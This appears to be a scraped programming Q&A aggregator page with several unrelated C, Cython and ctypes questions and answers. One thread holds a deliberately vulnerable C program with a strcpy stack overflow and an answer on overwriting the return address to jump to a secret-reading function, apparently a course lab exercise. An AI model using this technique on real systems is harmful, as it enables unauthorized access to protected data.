Cython print() outputs before C printf(), even when placed afterwards

Cython print() outputs before C printf(), even when placed afterwards - python

I'm trying to pick up Cython.
import counter
cdef public void increment():
counter.increment()
cdef public int get():
return counter.get()
cdef public void say(int times):
counter.say(times)
This is the "glue code" I'm using to call functions from counter.py, a pure Python source code file. It's laid out like this:
count = 0
def increment():
global count
count += 1
def get():
global count
return count
def say(times):
global count
print(str(count) * times)
I have successfully compiled and run this program. The functions work fine. However, a very strange thing occured when I tested this program:
int main(int argc, char *argv[]) {
Py_Initialize();
// The following two lines add the current working directory
// to the environment variable `PYTHONPATH`. This allows us
// to import Python modules in this directory.
PyRun_SimpleString("import sys");
PyRun_SimpleString("sys.path.append(\".\")");
PyInit_glue();
// Tests
for (int i = 0; i < 10; i++)
{
increment();
}
int x = get();
printf("Incremented %d times\n", x);
printf("The binary representation of the number 42 is");
say(3);
Py_Finalize();
return 0;
}
I would expect the program to produce this output:
Incremented 10 times
The binary representation of the number 42 is
101010
However, it prints this:
Incremented 10 times
101010
The binary representation of the number 42 is
But if I change the line
printf("The binary representation of the number 42 is");
to
printf("The binary representation of the number 42 is\n");
then the output is corrected.
This seems strange to me. I understand that if I want to print the output of a Python function, I might just as well return it to C and store it in a variable, and use C's printf() rather than the native Python print(). But I would be very interested to hear the reason this is happening. After all, the printf() statement is reached before the say() statement (I double checked this in gdb just to make sure). Thanks for reading.

Related

data gets corrupted between c and python

I am trying to use Cython and ctypes to call a c library function using Python.
But the data bytes get corrupted somehow. Could someone please help to locate the issue?
testCRC.c:
#include <stdio.h>
unsigned char GetCalculatedCrc(const unsigned char* stream){
printf("Stream is %x %x %x %x %x %x %x\n",stream[0],stream[1],stream[2],stream[3],stream[4],stream[5],stream[6]);
unsigned char dummy=0;
return dummy;
}
wrapped.pyx:
# Exposes a c function to python
def c_GetCalculatedCrc(const unsigned char* stream):
return GetCalculatedCrc(stream)
test.py:
x_ba=(ctypes.c_ubyte *7)(*[0xD3,0xFF,0xF7,0x7F,0x00,0x00,0x41])
x_ca=(ctypes.c_char * len(x_ba)).from_buffer(x_ba)
y=c_GetCalculatedCrc(x_ca.value)
output:
Stream is d3 ff f7 7f 0 0 5f # expected
0xD3,0xFF,0xF7,0x7F,0x00,0x00,0x41
Solution:
1.
I had to update the cython to 0.29 to have the fix for the bug which was not allowing to use the typed memory.(read only problem).
2.
It worked passing x_ca.raw. But when x_ca.value was passed it threw error 'out of bound access.'
After the suggestions from #ead & #DavidW:
´.pyx´:
def c_GetCalculatedCrc(const unsigned char[:] stream):
# Exposes a c function to python
print "received %s\n" %stream[6]
return GetCalculatedCrc(&stream[0])
´test.py´:
x_ba=(ctypes.c_ubyte *8)(*[0x47,0xD3,0xFF,0xF7,0x7F,0x00,0x00,0x41])
x_ca=(ctypes.c_char * len(x_ba)).from_buffer(x_ba)
y=c_GetCalculatedCrc(x_ca.raw)
output:
Stream is 47 d3 ff f7 7f 0 0 41

As pointed out by #DavidW the problem is your usage of x_ca.value: When x_ca.value is called, every time a new bytes-object is created (see documentation) and memory is copied:
x_ca.value is x_ca.value
#False -> every time a new object is created
However, when the memory is copied, it handles \0-character as end of string (which is typical for C-strings), as can be seen in source code:
static PyObject *
CharArray_get_value(CDataObject *self, void *Py_UNUSED(ignored))
{
Py_ssize_t i;
char *ptr = self->b_ptr;
for (i = 0; i < self->b_size; ++i)
if (*ptr++ == '\0')
break;
return PyBytes_FromStringAndSize(self->b_ptr, i);
}
Thus the result of x_ca.value is a bytes object of length 4, which doesn't share memory with x_ca - when you access stream[6] it leads to undefined behavior - anything could happen (also a crash).
So what can be done?
Normally, you just cannot have a pointer-argument in a def-function, but char * is an exception - a bytes object can be automatically converted to char *, which however doesn't happen via buffer protocol but via PyBytes_AsStringAndSize.
This is the reason, why you cannot pass x_ca to c_GetCalculatedCrc as it is: x_ca implements the buffer protocol, but is not a bytes-object and thus there is no PyBytes_AsStringAndSize.
An alternative is to use typed memory view, which utilizes the buffer protocol, i.e.
%%cython
def c_GetCalculatedCrc(const unsigned char[:] stream):
print(stream[6]);
and now passing x_ca directly, with original length/content:
c_GetCalculatedCrc(x_ca)
# 65 as expected
Another alternative would be to pass x_ca.raw to function expecting const unsigned char * as argument, as has been pointed out by #DavidW in comments, which shares memory with x_ca. However I would prefer the typed memory views - they are safer than raw pointers and you would not run into surprisingly undefined behavior.

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I print large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, and returns to the read_secret function, instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I would have to replace the main() address with the read_secret function's address, but I'm not sure how.
Thanks

If you want to execute a function through a buffer overflow vulnerability you have to first identify the offset at which you can get a segfault. In your case I assume its 1026. The whole game is to overwrite the eip(what tells the program what to do next) and then add your own instruction.
To add your own instruction you need to know the address of said instruction and then so in gdb open your program and then type in:
x function name
Then copy the address. You then have to convert it to big or little endian format. I do it with the struct module in python.
import struct
struct.pack("<I", address) # for little endian for big endian its different
Then you have to add it to your input to the binary so something like:
python -c "print 'a' * 1026 + 'the_address'" | /task2/vuln
#on bash shell, not in script
If all of this doesnt work then just add a few more characters to your offset. There might be something you didnt see coming.
python -c "print 'a' * 1034 + 'the_address'" | /task2/vuln
Hope that answers your question.

Python: XOR each character in a string

I'm trying to validate a checksum on a string which in this case is calculated by performing an XOR on each of the individual characters.
Given my test string:
check_against = "GPGLL,5300.97914,N,00259.98174,E,125926,A"
I figured it would be as simple as:
result = 0
for char in check_against:
result = result ^ ord(char)
I know the result should be 28, however my code gives 40.
I'm not sure what encoding the text is suppose to be in, although I've tried encoding/decoding in utf-8 and ascii, both with the same result.
I implemented this same algorithm in C by simply doing an XOR over the char array with perfect results, so what am I missing?
Edit
So it was a little while ago that I implemented (what I thought) was the same thing in C. I knew it was in an Objective-C project but I thought I had just done it this way. Totally wrong, first there was a step where I converted the checksum string value at the end to hex like so (I'm filling some things in here so that I'm only pasting what is relevant):
unsigned int checksum = 0;
NSScanner *scanner = [NSScanner scannerWithString:#"26"];
[scanner scanHexInt:&checksum];
Then I did the following to compute the checksum:
NSString sumString = #"GPGLL,5300.97914,N,00259.98174,E,125926,A";
unsigned int sum = 0;
for (int i=0;i<sumString.length;i++) {
sum = sum ^ [sumString characterAtIndex:i];
}
Then I would just compare like so:
return sum == checksum;

So as #metatoaster, #XD573, and some others in the comments have helped figure out, the issue was the difference between the result, which was base 10, and my desired solution (in base 16).
The result for the code, 40 is correct - in base 10, however my correct value I was trying to achieve, 28 is given in base 16. Simply converting the solution from base 16 to base 10, for example like so:
int('28', 16)
I get 40, the computed result.

#python3
str = "GPGLL,5300.97914,N,00259.98174,E,125926,A"
cks = 0
i = 0
while(i<len(str)):
cks^=ord(str[i])
i+=1
print("hex:",hex(cks))
print("dec:",cks)

I created the C version as shown here:
#include <stdio.h>
#include <string.h>
int main()
{
char* str1="GPGLL,5300.97914,N,00259.98174,E,125926,A";
int sum = 0;
int i = 0;
for (i; i < strlen(str1); i++) {
sum ^= str1[i];
}
printf("checksum: %d\n", sum);
return 0;
}
And When I compiled and ran it:
$ gcc -o mytest mytest.c
$ ./mytest
checksum: 40
Which leads me to believe that the assumptions you have from your equivalent C code are incorrect.

Python Fast Input Output Using Buffer Competitive Programming

I have seen people using buffer in different languages for fast input/output in Online Judges. For example this http://www.spoj.pl/problems/INTEST/ is done with C like this:
#include <stdio.h>
#define size 50000
int main (void){
unsigned int n=0,k,t;
char buff[size];
unsigned int divisible=0;
int block_read=0;
int j;
t=0;
scanf("%lu %lu\n",&t,&k);
while(t){
block_read =fread(buff,1,size,stdin);
for(j=0;j<block_read;j++){
if(buff[j]=='\n'){
t--;
if(n%k==0){
divisible++;
}
n=0;
}
else{
n = n*10 + (buff[j] - '0');
}
}
}
printf("%d",divisible);
return 0;
How can this be done with python?

import sys
file = sys.stdin
size = 50000
t = 0
while(t != 0)
block_read = file.read(size)
...
...
Most probably this will not increase performance though – Python is interpreted language, so you basically want to spend as much time in native code (standard library input/parsing routines in this case) as possible.
TL;DR either use built-in routines to parse integers or get some sort of 3rd party library which is optimized for speed.

I tried solving this one in Python 3 and couldn't get it to work no matter how I tried reading the input. I then switched to running it under Python 2.5 so I could use
import psyco
psyco.full()
After making that change I was able to get it to work by simply reading input from sys.stdin one line at a time in a for loop. I read the first line using raw_input() and parsed the values of n and k, then used the following loop to read the remainder of the input.
for line in sys.stdin:
count += not int(line) % k

ctypes outputting unknown value at end of correct values

I have the following DLL ('arrayprint.dll') function that I want to use in Python via ctypes:
__declspec(dllexport) void PrintArray(int* pArray) {
int i;
for(i = 0; i < 5; pArray++, i++) {
printf("%d\n",*pArray);
}
}
My Python script is as follows:
from ctypes import *
fiveintegers = c_int * 5
x = fiveintegers(2,3,5,7,11)
px = pointer(x)
mydll = CDLL('arrayprint.dll')
mydll.PrintArray(px)
The final function call outputs the following:
2
3
5
7
11
2226984
What is the 2226984 and how do I get rid of it? It doesn't look to be the decimal value for the memory address of the DLL, x, or px.
Thanks,
Mike
(Note: I'm not actually using PrintArray for anything; it was just the easiest example I could find that generated the same behavior as the longer function I'm using.)

mydll.PrintArray.restype = None
mydll.PrintArray(px)
By default ctypes assumes the function returns an integral type, which causes undefined behavior (reading a garbage memory location).

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.

Cython print() outputs before C printf(), even when placed afterwards - python

Related

data gets corrupted between c and python

Buffer overflow attack, executing an uncalled function

Python: XOR each character in a string

Python Fast Input Output Using Buffer Competitive Programming

ctypes outputting unknown value at end of correct values

Categories

Resources